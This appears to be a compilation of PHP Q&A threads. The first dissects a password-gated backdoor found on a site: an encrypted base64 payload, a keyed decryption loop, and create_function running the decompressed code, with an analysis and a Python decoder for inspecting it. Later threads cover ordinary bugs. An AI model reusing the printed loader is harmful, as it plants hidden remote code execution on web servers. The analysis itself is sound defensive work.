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
tyv1Lr0=
'));
//$l___l_ = $data
//$l__l_ = $input
//$l____l_ = $i and $func
//If the form was submitted, load from post, otherwise check for a cookie and use that.
$input=isset($_POST['input'])?$_POST['input']:(isset($_COOKIE['input'])?$_COOKIE['input']:NULL);
if($input!==NULL)
{
/*
This is a modified hash function, it looks like the md5 hash with extra characters on the end
I notice (because of the string reverse function in there) that when the input string is a palindrome
the extra characters on the end of the output string match the beginning of the output string e.g.
input string = '12321'
md5 = 8542516f8870173d7d1daba1daaaf0a1
modified md5 = 8542516f8870173d7d1daba1daaaf0a185425
The end of the modified md5 (85425) matches the beginning. Don't know how relevant that is.
*/
$input = md5($input).substr(md5(strrev($input)), 0, strlen($input));
//Note 15185 is the length of the data string above after base64 decoding.
for($i = 0; $i < 15185; $i++)
{
//Take the ascii # of the data char at each position and subtract the ascii # of the char
//at the same position in the hashed input. Loop over 256 and return as a char
$data[$i]=chr(( ord($data[$i])-ord($input[$i]))%256);
//Then add that char to the end of the hashed input string
$input.=$data[$i];
}
//$data has been modified at this point, if gzip succeeds in decompressing it
if($data=@gzinflate($data))
{
//If we made a post save it in a cookie
if(isset($_POST['input']))@setcookie('input', $_POST['input']);
//create a function from the unzipped data, unset used variables, and run the function.
$func=create_function('',$data);
unset($data,$input);
$func();
}
}?>
<form action="" method="post"><input type="text" name="input" value=""/><input type="submit" value=">"/></form>
So to summarize it looks like it takes your input, runs it through some md5 shenanigans, combines it with the de-base64'd block of data, unzips it, turns the result into a function, and runs it.
My question is why? Why not just take a text input and eval() it? What is this extra code giving the hacker that he couldn't do before? And is there any way I can see what's in the block of code? It looks like the input can't be plain php, but rather a string of gobbledegook that fits together with the data to create a valid zip file.

This code obfuscation is mainly done to hide the real activity from any researcher. Also, some tools can discover the malicious code if it's not obfuscated. To discover what's hidden behind the scenery, you could have dumped the $data var just before create_function was called. But you can't do that without knowing the incoming data from the hacker's input. If you really want to know what's there, you can set up logging for the input data and wait until the hacker comes to the site.
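
The scheme described in the question's comments, as an added Python example that is not part of the original post or answer: `decode_blob` undoes the autokey subtraction and the raw-DEFLATE step and returns the payload source without executing it, and `first_working_input` replays logged `input` values as the answer suggests. The password, payload and logged values are constructed, `make_sample` exists only to build that test fixture, and requiring the stream to end exactly at the end of the blob is this example's own choice.

```python
import hashlib
import zlib
from typing import Iterable, Optional, Tuple

MAX_OUT = 10 * 1024 * 1024  # cap on inflated size, guards against decompression bombs


def initial_key(password: bytes) -> bytes:
    """PHP: md5($input) . substr(md5(strrev($input)), 0, strlen($input))"""
    fwd = hashlib.md5(password).hexdigest()
    rev = hashlib.md5(password[::-1]).hexdigest()
    return (fwd + rev[: len(password)]).encode("ascii")


def decode_blob(blob: bytes, password: bytes) -> Optional[bytes]:
    """Return the hidden source for this password, or None if it does not fit.

    Mirrors the loader's loop: each decoded byte is appended to the key, so
    the key stream is the hash string followed by the plaintext itself.
    Nothing is executed; the result is only returned for inspection.
    """
    key = bytearray(initial_key(password))
    plain = bytearray()
    for i, c in enumerate(blob):
        p = (c - key[i]) % 256
        plain.append(p)
        key.append(p)  # autokey: a wrong start corrupts everything after it
    inflater = zlib.decompressobj(wbits=-15)  # raw DEFLATE, as gzinflate() reads
    try:
        source = inflater.decompress(bytes(plain), MAX_OUT)
    except zlib.error:
        return None
    # Accept only a stream that ends exactly at the end of the blob, so that
    # random garbage from a wrong password is not mistaken for a payload.
    if not inflater.eof or inflater.unused_data:
        return None
    return source


def first_working_input(
    blob: bytes, logged_inputs: Iterable[bytes]
) -> Optional[Tuple[bytes, bytes]]:
    """Try each logged POST/cookie 'input' value; return (value, source) on a hit."""
    for value in logged_inputs:
        source = decode_blob(blob, value)
        if source is not None:
            return value, source
    return None


def make_sample(password: bytes, source: bytes) -> bytes:
    """Build a constructed blob in the same layout (test fixture only)."""
    deflater = zlib.compressobj(wbits=-15)
    packed = deflater.compress(source) + deflater.flush()
    key = initial_key(password) + packed
    return bytes((b + key[i]) % 256 for i, b in enumerate(packed))


if __name__ == "__main__":
    # Constructed sample: harmless payload, made-up password and log values.
    sample_source = b'echo "constructed sample, not the real payload";'
    sample_blob = make_sample(b"constructed-pass", sample_source)
    logged = [b"admin", b"", b"constructed-pass"]  # constructed log entries

    print(decode_blob(sample_blob, b"guess"))  # wrong input decodes to nothing
    hit = first_working_input(sample_blob, logged)
    if hit is not None:
        value, source = hit
        print("input that unlocks the blob:", value.decode())
        print("hidden source:", source.decode())
```

Because the inflate step only succeeds for the right input, the blob stays unreadable to anyone who finds the file, which is what the extra code buys over a plain `eval()` of the request.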

How do I validate a PHP integer within a variable?

I have integrated Yelp reviews into my directory site with each venue that has a Yelp ID returning the number of reviews and overall score.
Following a successful MySQL query for all venue details, I output the results of the database formatted for the user. The Yelp element is:
while ($searchresults = mysql_fetch_array($sql_result)) {
if ($yelpID = $searchresults['yelpID']) {
require('yelp.php');
if ( $numreviews > 0 ) {
$yelp = '<img src="'.$ratingimg.'" border="0" /> Read '.$numreviews.' reviews on <img src="graphics/yelp_logo_50x25.png" border="0" /><br />';
} else {
$yelp = '';
}
} //END if ($yelpID = $searchresults['yelpID']) {
} //END while ($searchresults = mysql_fetch_array($sql_result)) {
The yelp.php file returns:
$yrating = $result->rating;
$numreviews = $result->review_count;
$ratingimg = $result->rating_img_url;
$url = $result->url;
If a venue has a Yelp ID and one or more reviews then the output displays correctly, but if the venue has no Yelp ID or zero reviews then it displays the Yelp review number of the previous venue.
I've checked the $numreviews variable type and it's an integer.
So far I've tried multiple variations of the "if ( $numreviews > 0 )" statement such as testing it against >=1, !$numreviews etc., also converting the integer to a string and comparing it against other strings.
There are no errors and printing all of the variables returned gives the correct number of reviews for each property with venues having no ID or no reviews returning nothing (as opposed to zero). I've also compared it directly against $result->review_count with the same problem.
Is there a better way to make the comparison or better format of variable to work with to get the correct result?
EDIT:
The statement if ($yelpID = $searchresults['yelpID']) { is not operating as it should. It is identical to other statements in the file, validating row contents which work correctly for their given variable, e.g. $fbID = $searchresults['fbID'] etc.
When I changed require('yelp.php'); to require_once('yelp.php'); all of the venue outputs changed to showing only the first iterated result. Looking through the venues outputted, the error occurs on the first venue after a successful result which makes me think there is a pervasive piece of code in the yelp.php file, causing if ($yelpID = $searchresults['yelpID']) { to be ignored until a positive result is found (a yelpID in the db), i.e. each venue is correctly displayed with a yelp number of reviews until a blank venue is encountered. The preceding venues' number of reviews is then displayed and this continues for each blank venue until a venue is found with a yelpID when it shows the correct number again. The error reoccurs on the next venue output with no yelpID and so on.
Sample erroneous output: (line 1 is var_dump)
string(23) "bayview-hotel-bushmills"
Bayview Hotel
Read 3 reviews on yelp
Benedicts
Read 3 reviews on yelp (note no var_dump output, this link contains the url for the Bayview Hotel entry above)
string(31) "bushmills-inn-hotel-bushmills-2"
Bushmills Inn Hotel
Read 7 reviews on yelp
I suspect this would be a new question rather than clutter/confuse this one further?
END OF EDIT
Note: I'm aware of the need to upgrade to mysqli but I have thousands of lines of legacy code to update. For now I'm working on functionality before reviewing the code for best practice.

Since the yelp.php is sort of a blackbox, the best explanation for this behavior would be that it only sets those variables if it finds a match. Updating your code to this should fix that:
unset($yrating, $numreviews, $ratingimg, $url);
require('yelp.php');
I also noticed this peculiar if-statement, do you realize that's an assignment or is this a copy/paste error? If you want to test (that's what if is for)
if ($yelpID == $searchresults['yelpID']) {

Unable to get stat gathering to work

Using PHP to gather stats from multiple files. Goal is to take the entire first row of data, which is the column name, then take the entire row of data from the row where the first column matches the name specified in the code. These two rows should then be linked to each other, so they can be displayed in a dynamic image.
However, to avoid excessive requests from the external data source, the data is only downloaded once a day by saving it into a json file. The previous day's data is also kept, to perform a difference calculation.
What I'm stuck on is...well, it's not working as intended. The dynamic image does not display and says it cannot be displayed because it contains errors, and the files aren't being created properly. Without any files existing, only the 'old' data file is being created, and the gathered data is saved there in a format that I didn't expect.
Here's the entire PHP code:
<?php
header("Content-Type:image/png");
$root=realpath($_SERVER['DOCUMENT_ROOT']);
function saveTeamData(){
$urls=array('http://www.dc-vault.com/stats/bio.txt','http://www.dc-vault.com/stats/math.txt','http://www.dc-vault.com/stats/misc.txt','http://www.dc-vault.com/stats/overall.txt','http://www.dc-vault.com/stats/phys.txt');
$fullJson=array();
function stats($url){
$json=array();
$team=array("teamName");
$file=fopen($url,'r');
$firstRow=fgetcsv($file,0,"\t");
while($data=fgetcsv($file,0,"\t")){
if(in_array($data[0],$team)){
foreach($firstRow as $indx=>$colName){
if((strpos($colName,'Position')!=0)||(strpos($colName,'Score')!=0)||(strpos($colName,'Team')!=0)){
if(strrpos($colName,'Position')!==false){
$colName=substr($colName,0,strpos($colName,' Position'));
$colName=$colName."Pos";
}else{
$colName=substr($colName,0,strpos($colName,' Score'));
$colName=$colName."Score";
}
$colName=str_replace(' ',',',$colName);
$teamData[$colName]=$data[$indx];
}
}
$json=$teamData;
}
}
fclose($file);
return $json;
}
foreach($urls as $item){
$fullJson=array_merge($fullJson,stats($item));
}
$final_json['teamName']=$fullJson;
$final_json['date']=date("Y-m-d G:i:s",strtotime("11:00"));
$final_json=json_encode($final_json);
file_put_contents("$root/scripts/vaultData.js",$final_json);
return $final_json;
}
if(!file_exists("$root/scripts/vaultData.js")){
$teamData=saveTeamData();
}else{
$teamData=json_decode(file_get_contents("$root/scripts/vaultData.js"));
}
$lastDate=$teamData->date;
$now=date("Y-m-d G:i:s");
$hours=(strtotime($now)-strtotime($lastDate))/3600;
if($hours>=24||!file_exists("$root/scripts/vaultDataOld.js")){
file_put_contents("$root/scripts/vaultDataOld.js",json_encode($teamData));
$teamData=saveTeamData();
}
$team=$teamData->{"teamName"};
$teamOld=json_decode(file_get_contents("$root/scripts/vaultDataOld.js"))->{"teamName"};
$template=imagecreatefrompng("$root/images/vaultInfo.png");
$black=imagecolorallocate($template,0,0,0);
$font='images/fonts/UbuntuMono-R.ttf';
$projects=array();
$subsections=array();
foreach($team as $key=>$val){
$projectName=preg_match("/^(.*)(?:Pos|Score)$/",$key,$cap);
$projectName=str_replace(","," ",$cap[1]);
if(preg_match("/Pos/",$key)){
$$key=(strlen($val)>10?substr($val,0,10):$val);
$delta=$key."Delta";
$$delta=($val - $teamOld->{$key});
$$delta=(strlen($$delta)>5?substr($$delta,0,5):$$delta);
if($projectName!=="Overall"){
if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){
$projects[$projectName]["position"]=$$key;
$projects[$projectName]["position delta"]=$$delta*1;
}else{
$subsections[$projectName]["position"]=$$key;
$subsections[$projectName]["position delta"]=$$delta*1;
}
}
}elseif(preg_match("/Score/",$key)){
$$key=(strlen($val)>10?substr($val,0,10):$val);
$delta=$key."Delta";
$$delta=($val - $teamOld->{$key});
$$delta=(strlen($$delta)>9?substr($$delta,0,9):$$delta);
if($projectName!=="Overall"){
if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){
$projects[$projectName]["score"]=$$key;
$projects[$projectName]["score delta"]=$$delta;
}else{
$subsections[$projectName]["score"]=$$key;
$subsections[$projectName]["score delta"]=$$delta;
}
}
}
}
$sort=array();
foreach($projects as $key=>$row){
$sort[$key]=$row["score"];
}
array_multisort($sort,SORT_DESC,$projects);
$lastupdated=round($hours,2).' hours ago';
$y=35;
foreach($projects as $name=>$project){
imagettftext($template,10,0,5,$y,$black,$font,$name);
imagettftext($template,10,0,149,$y,$black,$font,$project['position']);
imagettftext($template,10,0,216,$y,$black,$font,$project['position delta']*-1);
imagettftext($template,10,0,257,$y,$black,$font,$project['score']);
imagettftext($template,10,0,331,$y,$black,$font,$project['score delta']);
$y+=20;
}
$y=655;
foreach($subsections as $name=>$subsection){
imagettftext($template,10,0,5,$y,$black,$font,$name);
imagettftext($template,10,0,149,$y,$black,$font,$subsection['position']);
imagettftext($template,10,0,216,$y,$black,$font,$subsection['position delta']*-1);
imagettftext($template,10,0,257,$y,$black,$font,$subsection['score']);
imagettftext($template,10,0,331,$y,$black,$font,$subsection['score delta']);
$y+=20;
}
imagettftext($template,10,0,149,735,$black,$font,$team->{'OverallPos'});
imagettftext($template,10,0,216,735,$black,$font,$OverallPosDelta*-1);
imagettftext($template,10,0,257,735,$black,$font,$OverallScore);
imagettftext($template,10,0,331,735,$black,$font,$OverallScoreDelta);
imagettftext($template,10,0,149,755,$black,$font,$lastupdated);
imagepng($template);
?>
And here is what the data looks like when it is saved:
"{\"teamName\":{\"Folding#HomePos\":\"51\",\"Folding#HomeScore\":\"9994.405407\"},\"date\":\"2014-03-14 11:00:00\"}"
I've omitted most of the data because it just makes things excessively long, and it helps to see the format. Now the reason why it's an unexpected output is because I didn't expect trailing slashes to be in it. The older version of this code would output like this:
{"teamName":{"Asteroids#HomePos":"192","Asteroids#HomeScore":"7647.783251"},"date":"2014-03-14 11:00:00"}
So the expected behaviour is to gather the data from the aforementioned rows in each tab-delimited text file, copy the old data into the 'old' data file (vaultDataOld), save the new data into the 'current' data file (vaultData), and then display the data from the 'current' file in a dynamic image, along with performing a 'new' minus 'old' calculation on the two files to show the change since the previous day.
Most of this code should work, as I've had it working before in a different way. The issue likely lies somewhere with gathering the row data and saving it, most probably the latter. I'm guessing the slashes are causing the issue.
Turns out that the cause was twofold. Firstly, in my function, I was JSON encoding something that had already been encoded, so when the second file was saved, it appeared as shown in my question. To fix that, I did this:
$final_json['date']=date("Y-m-d G:i:s",strtotime("11:00"));
$encode_json=json_encode($final_json);
file_put_contents("$root/scripts/vaultData.js",$encode_json);
return $final_json;
In addition, as pointed out by another in the comments, I had to add $root to my function, and again within it.
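The double encoding described in this answer, reproduced as an added example that is not part of the original posts. The helper names `saveSnapshot` and `loadSnapshot` are hypothetical, the data is a constructed sample in the shape shown in the question, and the files are written to the system temp directory rather than `$root/scripts`.

```php
<?php
// Constructed sample in the shape shown in the question.
$data = [
    'teamName' => ['Folding#HomePos' => '51', 'Folding#HomeScore' => '9994.405407'],
    'date'     => '2014-03-14 11:00:00',
];

// What the question's code does: the save function returns an encoded
// string, and the caller passes that string through json_encode() again.
$once  = json_encode($data);
$twice = json_encode($once);   // a single JSON string whose quotes are escaped
echo $twice, "\n";

// Hypothetical helper: encode exactly once, write the file, and hand back the
// decoded object so callers never hold (and re-encode) the JSON text.
function saveSnapshot(string $path, array $data): stdClass
{
    $json = json_encode($data);
    if ($json === false || file_put_contents($path, $json, LOCK_EX) === false) {
        throw new RuntimeException("could not write $path");
    }
    return json_decode($json);
}

// Hypothetical helper: read a cache file, unwrap one accidental extra layer
// of encoding, and refuse anything that is not an object with a date.
function loadSnapshot(string $path): stdClass
{
    $decoded = json_decode((string) file_get_contents($path));
    if (is_string($decoded)) {          // file held a JSON string, not an object
        $decoded = json_decode($decoded);
    }
    if (!$decoded instanceof stdClass || !isset($decoded->date)) {
        throw new UnexpectedValueException("$path is not a valid snapshot");
    }
    return $decoded;
}

$dir = sys_get_temp_dir();
file_put_contents("$dir/vaultDataOld.js", $twice);   // damaged file, as in the question
$old = loadSnapshot("$dir/vaultDataOld.js");
$new = saveSnapshot("$dir/vaultData.js", $data);
echo $old->teamName->{'Folding#HomePos'}, ' ', $new->date, "\n";
```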

String comparison fails because of value passed by datatable, codeigniter

I am facing a really strange problem which I have been debugging for the past 2 hours but I am unable to find the solution. Before explaining the problem, let me show the code.
My Controller Function is
$this->load->library('datatables');
$actionLinkBar = $this->load->view("content/updates/dt_files/action_bar", array(), TRUE);
$this->datatables
->select("id, name, status")
->where('id', $this->session_data['user_id'])
->from("t_user")
->add_column("action", $actionLinkBar, 'id, name, status');
echo $this->datatables->generate();
And the code in my action_bar view is
<?php
$status_rec = '$3';
var_dump($status_rec); // STRANGE OUTPUT - string(2) "1"
?>
<div class="action_bar" data-update-id="<?php echo '$1'; ?>">
<?php if ($status_rec == '1') { ?> // HENCE COMPARISON ALWAYS FAILS
<span>Present</span>
<?php }else { ?>
<span>Absent</span>
<?php } ?>
</div>
Now explaining the problem. I am using Datatables with Codeigniter. I have a view template action_bar which will be displayed in one of the columns of the datatable in the front end. The view has an if/else condition based on the value of the status field from the DB. If the status field value = 1 = Present. Else it is Absent. But though $status_rec has the value '1', it still fails in comparison. The strange thing is that on var_dumping $status_rec, I found that though it has the proper value, the length is weird (2) though it's a single int. I even tried trimming etc. but still no effect. Maybe that's why the comparison is failing. Your help is really needed :/
P.S. - The DB field that holds this value is int with length 1
I also had a similar problem and solved it a bit by changing the library:
Datatables.php with if condition
changes in the 194, 196 and 440 strings
How to use:
$if = array('0' => array('if_condition'=>'$3', 'if_condition_eqv'=>'1', 'if_true'=>'<span>Present</span></div>', 'if_false'=>'<span>Absent</span></div>'));
$this->datatables->add_column("action", '<div class="action_bar" data-update-id="$1">', 'id, name, status');
BUT you have to change ".=" to "=" (strings 497 and 504)
Should work.
I would really appreciate it if someone would correct the code
P.S. Sorry for my English
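Why `var_dump` reports `string(2)` in the question, modelled as an added example that is not part of the original posts and is not the Datatables library's code. It assumes the library fills `$1`..`$n` only after the view has already been rendered to a string, which is consistent with the output shown. All function names and the sample row are hypothetical.

```php
<?php
// Stand-in for $this->load->view(..., TRUE): the template's PHP runs now,
// while $status_rec still holds the two-character placeholder text "$3".
function renderActionBar(): string
{
    $status_rec = '$3';
    $label = ($status_rec == '1') ? 'Present' : 'Absent';   // compares "$3" with "1"
    return '<div class="action_bar" data-update-id="$1">'
         . '<!-- len=' . strlen($status_rec) . ' val=' . $status_rec . ' -->'
         . "<span>$label</span></div>";
}

// Stand-in for the later per-row substitution: plain text replacement on the
// finished HTML, so it can no longer affect the if/else decided above.
function fillPlaceholders(string $html, array $row): string
{
    $map = [];
    foreach (array_values($row) as $i => $value) {
        // Row values land in HTML, so they are escaped on the way in.
        $map['$' . ($i + 1)] = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }
    return strtr($html, $map);   // strtr matches the longest key first ($10 before $1)
}

// Deciding per row, once the real value is known, gives the intended label.
function actionBarForRow(array $row): string
{
    $label = ((string) $row['status'] === '1') ? 'Present' : 'Absent';
    return sprintf(
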